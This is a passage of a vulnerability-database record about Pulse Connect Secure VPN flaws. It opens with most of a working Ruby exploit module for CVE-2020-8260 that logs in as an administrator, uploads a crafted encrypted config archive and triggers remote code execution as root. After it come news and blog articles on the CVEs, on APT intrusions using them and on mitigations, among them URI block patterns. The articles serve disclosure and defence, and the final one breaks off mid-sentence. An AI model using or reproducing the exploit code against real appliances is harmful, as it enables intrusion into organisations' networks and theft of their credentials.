#{revision.strip}, build #{build.strip} found\")\r\n return CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9\r\n\r\n CheckCode::Detected\r\n rescue Msf::Exploit::Failed\r\n CheckCode::Unknown\r\n ensure\r\n logout unless exploiting\r\n end\r\n\r\n def exploit\r\n case (checkcode = check(exploiting: true))\r\n when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears\r\n print_good(checkcode.message)\r\n when Exploit::CheckCode::Detected\r\n print_warning(checkcode.message)\r\n else\r\n fail_with(Module::Failure::Unknown, checkcode.message.to_s)\r\n end\r\n\r\n case target['Type']\r\n when :unix_memory\r\n execute_command(payload.encoded)\r\n when :linux_dropper\r\n execute_cmdstager(\r\n linemax: 262144, # 256KiB\r\n delay: datastore['CMDSTAGER::DELAY']\r\n )\r\n end\r\n\r\n logout\r\n end\r\n\r\n def execute_command(command, _opts = {})\r\n trigger = Rex::Text.rand_text_alpha_upper(8)\r\n print_status(\"Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}\")\r\n\r\n config = build_malicious_config(command, trigger)\r\n res = upload_config(config)\r\n\r\n fail_with(Failure::UnexpectedReply, 'File upload failed') unless res&.code == 200\r\n\r\n print_status('Triggering RCE')\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'),\r\n 'headers' => { trigger => trigger }\r\n })\r\n end\r\n\r\n def res_get_xsauth(res)\r\n res.body.scan(%r{name=\"xsauth\" value=\"([^\"]+)\"/>})&.last&.first\r\n end\r\n\r\n def upload_config(config)\r\n print_status('Requesting backup config page')\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'),\r\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\r\n 'vars_get' => { 'type' => 'system' }\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200\r\n xsauth = res_get_xsauth(res)\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil?\r\n\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(xsauth, nil, nil, 'form-data; name=\"xsauth\"')\r\n post_data.add_part('Import', nil, nil, 'form-data; name=\"op\"')\r\n post_data.add_part('system', nil, nil, 'form-data; name=\"type\"')\r\n post_data.add_part('8', nil, nil, 'form-data; name=\"optWhat\"')\r\n post_data.add_part('', nil, nil, 'form-data; name=\"txtPassword1\"')\r\n post_data.add_part('Import Config', nil, nil, 'form-data; name=\"btnUpload\"')\r\n post_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name=\"uploaded_file\"; filename=\"system.cfg\"')\r\n\r\n print_status('Uploading encrypted config backup')\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'),\r\n 'method' => 'POST',\r\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\r\n 'data' => post_data.to_s,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\r\n })\r\n end\r\n\r\n def login\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'tz_offset' => '-300',\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD'],\r\n 'realm' => 'Admin Users',\r\n 'btnSubmit' => 'Sign In'\r\n },\r\n 'keep_cookies' => true\r\n })\r\n\r\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302\r\n location = res.headers['Location']\r\n fail_with(Failure::NoAccess, 'Login failed') if location.include?('failed')\r\n\r\n return unless location.include?('admin%2Dconfirm')\r\n\r\n # if the account we login with is already logged in, or another admin is logged in, a warning is displayed. Click through it.\r\n print_status('Other admin sessions detected, continuing')\r\n res = send_request_cgi({ 'uri' => location, 'keep_cookies' => true })\r\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200\r\n fds = res.body.scan(/name=\"FormDataStr\" value=\"([^\"]+)\">/).last\r\n xsauth = res_get_xsauth(res)\r\n fail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'btnContinue' => 'Continue the session',\r\n 'FormDataStr' => fds.first,\r\n 'xsauth' => xsauth\r\n },\r\n 'keep_cookies' => true\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res\r\n end\r\n\r\n def logout\r\n print_status('Logging out to prevent warnings to other admins')\r\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') })\r\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200\r\n\r\n logout_uri = res.body.scan(%r{/dana-na/auth/logout\\.cgi\\?xsauth=\\w+}).first\r\n fail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil?\r\n\r\n res = send_request_cgi({ 'uri' => logout_uri })\r\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302\r\n end\r\n\r\n def build_malicious_config(cmd, trigger)\r\n payload_script = \"#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh\"\r\n perl = <<~PERL\r\n if (length $ENV{HTTP_#{trigger}}){\r\n chmod 0775, \"/data/var/runtime/tmp/tt/#{payload_script}\";\r\n system(\"env /data/var/runtime/tmp/tt/#{payload_script}\");\r\n }\r\n PERL\r\n tarfile = StringIO.new\r\n Gem::Package::TarWriter.new(tarfile) do |tar|\r\n tar.mkdir('tmp', 509)\r\n tar.mkdir('tmp/tt', 509)\r\n tar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio|\r\n tio.write perl\r\n end\r\n tar.add_file(\"tmp/tt/#{payload_script}\", 511) do |tio|\r\n tio.write \"PATH=/home/bin:$PATH\\n\"\r\n tio.write \"rm -- \\\"$0\\\"\\n\"\r\n tio.write cmd\r\n end\r\n end\r\n\r\n gzfile = StringIO.new\r\n gz = Zlib::GzipWriter.new(gzfile)\r\n gz.write(tarfile.string)\r\n gz.close\r\n\r\n encrypt_config(gzfile.string)\r\n end\r\n\r\n def encrypt_config(config_blob)\r\n cipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt\r\n iv = cipher.iv = cipher.random_iv\r\n cipher.key = ENCRYPTION_KEY\r\n\r\n md5 = OpenSSL::Digest.new('MD5', \"#{iv}\\x00#{[config_blob.length].pack('V')}\")\r\n\r\n ciphertext = cipher.update(config_blob)\r\n ciphertext << cipher.final\r\n md5 << ciphertext\r\n\r\n cipher.reset\r\n \"\\x09#{iv}\\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}\"\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "sourceHref": "https://0day.today/exploit/35525", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2021-08-10T08:34:40", "description": "[](<https://thehackernews.com/images/-RY_dyS_4TCQ/YRDt_NkuUVI/AAAAAAAADeQ/wS5GjyTOcHgamafaxl_uz3MdktJc_UMHACLcBGAsYHQ/s0/pulse-secure-vpn.jpg>)\n\nPulse Secure has shipped a fix for a critical post-authentication remote code execution (RCE) vulnerability in its Connect Secure virtual private network (VPN) appliances to address an incomplete patch for an actively exploited flaw it previously resolved in October 2020.\n\n\"The Pulse Connect Secure appliance suffers from an uncontrolled archive extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root,\" NCC Group's Richard Warren [disclosed](<https://research.nccgroup.com/2021/08/05/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-archive-extraction-cve-2021-22937-patch-bypass/>) on Friday. \"This vulnerability is a bypass of the patch for [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>).\"\n\n[](<https://go.thn.li/1-free-300-7> \"Stack Overflow Teams\" )\n\n\"An attacker with such access will be able to circumvent any restrictions enforced via the web application, as well as remount the filesystem, allowing them to create a persistent backdoor, extract and decrypt credentials, compromise VPN clients, or pivot into the internal network,\" Warren added.\n\nThe disclosure comes days after Ivanti, the company behind Pulse Secure, [published an advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) for as many as six security vulnerabilities on August 2, urging customers to move quickly to update to Pulse Connect Secure version 9.1R12 to secure against any exploitation attempts targeting the flaws.\n\nTracked as CVE-2021-22937 (CVSS score: 9.1), the shortcoming could \"allow an authenticated administrator to perform a file write via a maliciously crafted archive uploaded in the administrator web interface,\" according to Pulse Secure. CVE-2020-8260 (CVSS core: 7.2), which concerns an arbitrary code execution flaw using uncontrolled gzip extraction, was [remediated](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) in October 2020 with version 9.1R9.\n\n\"CVE-2021-2293 is a separate vulnerability and is not a bypass of CVE-2020-8260, but is similar in terms of impact and vulnerability type, which is why we assigned a separate CVE,\" Daniel Spicer, Invanti's vice president of security, said in a statement to The Hacker News.\n\nThe vulnerability is due to a flaw in the way that archive files (.TAR) are extracted in the administrator web interface. While further checks were added to validate the TAR file to prevent exploitation of CVE-2020-8260, additional variant and patch analysis revealed that it's possible to exploit the same extraction vulnerability in the part of the source code that handles profiler device databases, effectively getting around the mitigations put in place.\n\n\"Whilst this issue was patched by adding validation to extracted files, this validation does not apply to archives with the 'profiler' type,\" Warren said. \"Therefore, by simply modifying the original CVE-2020-8260 exploit to change the archive type to 'profiler', the patch can be bypassed, and code execution achieved.\"\n\n[](<https://go.thn.li/privileged_728> \"Prevent Data Breaches\" )\n\nIt's worth noting that CVE-2020-8260 was one among the four Pulse Secure flaws that was [actively exploited by threat actors](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) earlier this April to stage a series of intrusions targeting defense, government, and financial entities in the U.S. and beyond in a bid to circumvent multi-factor authentication protections and breach enterprise networks. Given the possibility of real-world exploitation, it's highly recommended to upgrade to Pulse Connect Secure (PCS) 9.1R12, or later.\n\n\"A rigorous code review is just one of the steps we are taking to further bolster our security and protect our customers,\" Spicer [said](<https://blog.pulsesecure.net/improved-security-testing-procedures/>). \"For instance, we are also further expanding our existing internal product security resources to ramp up the pace and intensity of testing on existing products as well as those of companies or systems that we integrate into Ivanti.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T09:00:00", "type": "thn", "title": "Pulse Secure VPNs Get New Urgent Update for Poorly Patched Critical Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260", "CVE-2021-2293", "CVE-2021-22937"], "modified": "2021-08-10T07:48:11", "id": "THN:9FB8DE3BF545932321335F2C525A4A36", "href": "https://thehackernews.com/2021/08/pulse-secure-vpns-get-new-urgent-update.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-04-21T18:40:07", "description": "[](<https://thehackernews.com/images/-HxsxXCBkPXE/YH-natH6OTI/AAAAAAAACUA/6_XHWg-Cu_YYS4p-8w6I8XWh3VRUU9ZMQCLcBGAsYHQ/s0/pulse-secure-hacking.jpg>)\n\nIf Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch available yet.\n\nAt least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks.\n\n\"A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), are responsible for the initial infection vector,\" cybersecurity firm FireEye [said](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances.\n\n[](<https://go.thn.li/1-300-6> \"password auditor\" )\n\nThe company is also tracking the activity under two threat clusters UNC2630 and UNC2717 (\"[UNC](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>)\" for Uncategorized) \u2014 the former linked to a break-in of U.S. Defense Industrial base (DIB) networks, while the latter was found targeting a European organization in March 2021 \u2014 with the investigation attributing UNC2630 to operatives working on behalf of the Chinese government, in addition to suggesting possible ties to another espionage actor [APT5](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt5>) based on \"strong similarities to historic intrusions dating back to 2014 and 2015.\"\n\n[](<https://thehackernews.com/images/-_r1BkPmCUK8/YH-n1A6EuZI/AAAAAAAACUI/MS0JCaPy_hEkXJpAquULKRANPrKeNuL_gCLcBGAsYHQ/s728/vpn-hacking.jpg>)\n\nAttacks staged by UNC2630 are believed to have commenced as early as August 2020, before they expanded in October 2020, when UNC2717 began repurposing the same flaws to install custom malware on the networks of government agencies in Europe and the U.S. The incidents continued until March 2021, according to FireEye.\n\nThe list of malware families is as follows -\n\n * **UNC2630** \\- SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK\n * **UNC2717** \\- HARDPULSE, QUIETPULSE, AND PULSEJUMP\n\nTwo additional malware strains, STEADYPULSE and LOCKPICK, deployed during the intrusions have not been linked to a specific group, citing lack of evidence.\n\nBy exploiting multiple Pulse Secure VPN weaknesses ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>), [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>), and CVE-2021-22893), UNC2630 is said to have harvested login credentials, using them to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts to enable arbitrary command execution and inject web shells capable of carrying out file operations and running malicious code.\n\n[](<https://go.thn.li/2-728-6> \"password auditor\" )\n\nIvanti, the company behind the Pulse Secure VPN, has released [temporary mitigations](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) to address the arbitrary file execution vulnerability ([CVE-2021-22893](<https://kb.cert.org/vuls/id/213092>), CVSS score: 10), while a fix for the issue is expected to be in place by early May. The Utah-based company acknowledged that the new flaw impacted a \"[very limited number of customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>),\" adding it has released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for customers to check for signs of compromise.\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.4 when it becomes available.\n\nNews of compromises affecting government agencies, critical infrastructure entities, and other private sector organizations comes a week after the U.S. government [released an advisory](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>), warning businesses of active exploitation of five publicly known vulnerabilities by the Russian Foreign Intelligence Service (SVR), including CVE-2019-11510, to gain initial footholds into victim devices and networks.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2021-04-21T04:20:00", "type": "thn", "title": "WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T17:42:28", "id": "THN:AE2E46F59043F97BE70DB77C163186E6", "href": "https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-05-04T12:27:56", "description": "Pulse Secure has [alerted customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>) to the existence of an exploitable chain of attack against its Pulse Connect Secure (PCS) appliances. PCS provides Virtual Private Network (VPN) facilities to businesses, which use them to prevent unauthorized access to their networks and services.\n\nCybersecurity sleuths Mandiant report that they are tracking "12 malware families associated with the exploitation of Pulse Secure VPN devices" operated by groups using a set of related techniques to bypass both single and multi-factor authentication. Most of the problems discovered by Pulse Secure and Mandiant involve three vulnerabilities that were patched in 2019 and 2020. But there is also a very serious new issue that it says impacts a very limited number of customers.\n\n### The old vulnerabilities\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The patched vulnerabilities are listed as:\n\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. We [wrote](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) about the apparent reluctance to patch for this vulnerability in 2019.\n * [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>) a vulnerability in the Pulse Connect Secure < 9.1R8.2 admin web interface could allow an authenticated attacker to upload a custom template to perform an arbitrary code execution.\n * [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>) a vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.\n\nThe obvious advice here is to review the Pulse advisories for these vulnerabilities and follow the recommended guidance, which includes changing all passwords in the environments that are impacted.\n\n### The new vulnerability\n\nThe new vulnerability (CVE-2021-22893) is a Remote Code Execution (RCE) vulnerability with a CVSS score of 10\u2014the maximum\u2014and a Critical rating. According to [the Pulse advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>):\n\n> [The vulnerability] includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment.\n\nThere is no patch for it yet (it is expected to be patched in early May), so system administrators will need to mitigate for the problem for now, rather than simply fixing it. Please don't wait for the patch.\n\n### Mitigation requires a workaround\n\nAccording to Pulse Secure, until the patch is available CVE-2021-22893 can be mitigated by importing a workaround file. More details can be found in the company's [Security Advisory 44784](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>). Reportedly, the workaround disables Pulse Collaboration, a feature that allows users to schedule and hold online meetings between both Connect Secure users and non-Connect Secure users. The workaround also disables the Windows File Share Browser that allows users to browse network file shares.\n\n### Targets\n\nThe Pulse Connect Secure vulnerabilities including CVE-2021-22893 have been used to target government, defense and financial organizations around the world, but mainly in the US. According to some articles the threat-actors are linked to China. The identified threat actors were found to be harvesting account credentials. Very likely in order to perform lateral movement within compromised organizations' environments. They have also observed threat actors deploying modified Pulse Connect Secure files and scripts in order to maintain persistence. These modified scripts on the Pulse Secure system are reported to have allowed the malware to survive software updates and factory resets.\n\n### Threat analysis\n\nFireEye's Mandiant was involved in the research into these vulnerabilities. It has posted an elaborate analysis of the related malware, which they have dubbed SlowPulse. According to Mandiant, the malware and its variants are "applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so". In their [blogpost](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) they discuss 4 variants. Interested parties can also find technical details and detections there.\n\n### Networking devices\n\nState sponsored cyber-attacks are often more about espionage than about monetary gain with the exception of sabotage against an enemy state. A big part of the espionage is getting hold of login credentials of those that have access to interesting secret information. Breaking into network devices in a way that can be used to extract login credential is an important strategy in this secret conflict. Keep in mind that attribution is always hard and tricky. You may end up reaching the conclusion they wanted you to reach. Given the targets and the methodology however, it makes sense in this case to look first at state sponsored threat actors.\n\n### Update May 4th\n\nThe Pulse Secure team released a security update to address the issue outlined in [Security Advisory SA44784 (CVE-2021-22893)](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44784/s>) impacting the Pulse Connect Secure appliance. It is recommend that customers act urgently to apply the update to ensure they are protected. On that note, Pulse Secure also recommends that customers use the Pulse Security Integrity Checker Tool, a tool for customers to identify malicious activity on their systems, and that they continue to apply and follow recommended guidance for all available security patches.\n\nThe post [Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T18:12:15", "type": "malwarebytes", "title": "Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T18:12:15", "id": "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-04-21T15:44:32", "description": "A critical zero-day security vulnerability in Pulse Secure VPN devices has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe, researchers said.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nThe flaw, tracked as CVE-2021-22893, allows remote code-execution (RCE) and is being used in the wild to gain administrator-level access to the appliances, according to Ivanti research. Pulse Secure said that the zero-day will be patched in early May; but in the meantime, the company worked with Ivanti (its parent company) to release both mitigations and the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/KB44755/s>), to help determine if systems have been impacted.\n\n\u201cThe investigation shows ongoing attempts to exploit four issues: The substantial bulk of these issues involve three vulnerabilities that were patched in 2019 and 2020: [Security Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) (CVE-2019-11510), [Security Advisory SA44588](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588>) (CVE-2020-8243) and [Security Advisory SA44601](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) (CVE-2020-8260),\u201d according to a Pulse Secure statement provided to Threatpost. \u201cThe new issue, discovered this month, impacted a very limited number of customers.\u201d\n\n## **CVE-2021-22893: A Zero-Day in Pulse Connect Secure VPNs**\n\nThe newly discovered critical security hole is rated 10 out of 10 on the CVSS vulnerability-rating scale. It\u2019s an authentication bypass vulnerability that can allow an unauthenticated user to perform RCE on the Pulse Connect Secure gateway. It \u201cposes a significant risk to your deployment,\u201d according to the advisory, [issued Tuesday](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>).\n\n\u201cThe ongoing COVID-19 crisis resulted in an overnight shift to remote work culture, and VPNs played a critical role to make this possible,\u201d Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said via email. \u201cVPNs have become a prime target for cybercriminals and over the past few months.\u201d\n\n\u201cThe Pulse Connect Secure vulnerability with CVE-2021-22893\u2026can be exploited without any user interaction,\u201d he added.\n\nThe mitigations involve importing a file called \u201cWorkaround-2104.xml,\u201d available on the advisory page. It disables the Windows File Share Browser and Pulse Secure Collaboration features on the appliance.\n\nUser can also use the blacklisting feature to disable URL-based attacks, the firm noted, by blocking the following URIs:\n\n * ^/+dana/+meeting\n * ^/+dana/+fb/+smb\n * ^/+dana-cached/+fb/+smb\n * ^/+dana-ws/+namedusers\n * ^/+dana-ws/+metric\n\n\u201cThe Pulse Connect Secure (PCS) team is in contact with a limited number of customers who have experienced evidence of exploit behavior on their PCS appliances,\u201d according to Pulse Secure. \u201cThe PCS team has provided remediation guidance to these customers directly.\u201d\n\nAccording to tandem research from Mandiant, this and the other bugs are at the center of a flurry of activity by different threat actors, involving 12 different malware families overall. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement. Two specific advanced persistent threat (APT) groups, UNC2630 and UNC2717, are particularly involved, researchers said.\n\n## **UNC2630 Cyber-Activity: Links to China**\n\n\u201cWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments,\u201d according to Mandiant, in a [Tuesday posting](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>). \u201cIn order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance.\u201d\n\nThe firm tracks those tools as the following:\n\n * **SlowPulse:** Trojanized shared objects with malicious code to log credentials and bypass authentication flows within the legitimate Pulse Secure shared object libdsplibs.so, including multifactor authentication requirements.\n * **RadialPulse and PulseCheck:** Web shells injected into legitimate, internet-accessible Pulse Secure VPN appliance administrative web pages.\n * **ThinBlood:** A utility used to clear relevant log files.\n * **Other capabilities:** Toggling the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem; the ability to maintain persistence across VPN appliance general upgrades that are performed by the administrator; and the ability to unpatch modified files and delete utilities and scripts after use to evade detection.\n\nUNC2630 targeted U.S. defense-sector companies as early as last August, Mandiant noted. It added that the activity could be state-sponsored, likely backed by China.\n\n\u201cWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5,\u201d according to the analysis. \u201cUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5.\u201d\n\nAPT5 consistently targets defense and technology companies in the Asia, Europe and the U.S., Mandiant noted.\n\n\u201c[It] has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances,\u201d Mandiant researchers said. \u201cAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u201d\n\n## **The UNC2717 APT Connection**\n\nAs for UNC2717, Mandiant linked Pulse Secure zero-day activity back to the APT in a separate incident in March, targeted against an unnamed European organization. UNC2717 was also seen targeting global government agencies between October and March.\n\nSo far, there\u2019s not enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group, Mandiant said.\n\nThe tools used by this group include HardPulse, which is a web shell; PulseJump, used for credential-harvesting; and RadialPulse. The firm also observed a new malware that it calls LockPick, which is a trojanized OpenSSL library file that appears to weaken encryption for communications used by the VPN appliances.\n\nAll of the malware families in use in the campaigns appear to be loosely related, according to Mandiant.\n\n\u201cAlthough we did not observe PulseJump or HardPulse used by UNC2630 against U.S. [defense] companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630,\u201d researchers said.\n\nThey added, \u201cMandiant cannot associate all the code families described in this report to UNC2630 or 